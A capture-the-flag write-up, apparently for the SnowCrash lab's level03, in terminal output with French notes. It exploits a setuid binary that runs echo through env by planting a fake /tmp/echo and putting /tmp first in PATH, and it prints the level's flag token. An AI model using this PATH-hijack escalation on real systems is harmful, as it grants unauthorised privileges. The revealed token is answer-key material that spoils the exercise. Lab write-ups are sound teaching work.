level03@SnowCrash:~$ ls -la
total 24
dr-x------ 1 level03 level03  120 Mar  5  2016 .
d--x--x--x 1 root    users    340 Aug 30  2015 ..
-r-x------ 1 level03 level03  220 Apr  3  2012 .bash_logout
-r-x------ 1 level03 level03 3518 Aug 30  2015 .bashrc
-r-x------ 1 level03 level03  675 Apr  3  2012 .profile
-rwsr-sr-x 1 flag03  level03 8627 Mar  5  2016 level03

level03 est un executable execute avec les droits de flag03

level03@SnowCrash:~$ ./level03 
Exploit me

level03@SnowCrash:~$ hexdump -C level03 
00000000  7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
...
000005d0  ff 83 c4 08 5b c3 00 00  03 00 00 00 01 00 02 00  |....[...........|
000005e0  2f 75 73 72 2f 62 69 6e  2f 65 6e 76 20 65 63 68  |/usr/bin/env ech|
000005f0  6f 20 45 78 70 6c 6f 69  74 20 6d 65 00 00 00 00  |o Exploit me....|
00000600  01 1b 03 3b 30 00 00 00  05 00 00 00 70 fd ff ff  |...;0.......p...|
...
000021b0  69 74 00                                          |it.|
000021b3

Il execute env (surement pour recuperer la variable PATH) et execute echo
On peut creer un faux executable 'echo' quelque part dans la vm qui executera en fait getflag, et rajouter son path au debut de la variable PATH

level03@SnowCrash:~$ echo 'getflag' > /tmp/echo
level03@SnowCrash:~$ chmod 755 /tmp/echo
level03@SnowCrash:~$ export PATH=/tmp:$PATH
level03@SnowCrash:~$ ./level03 
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
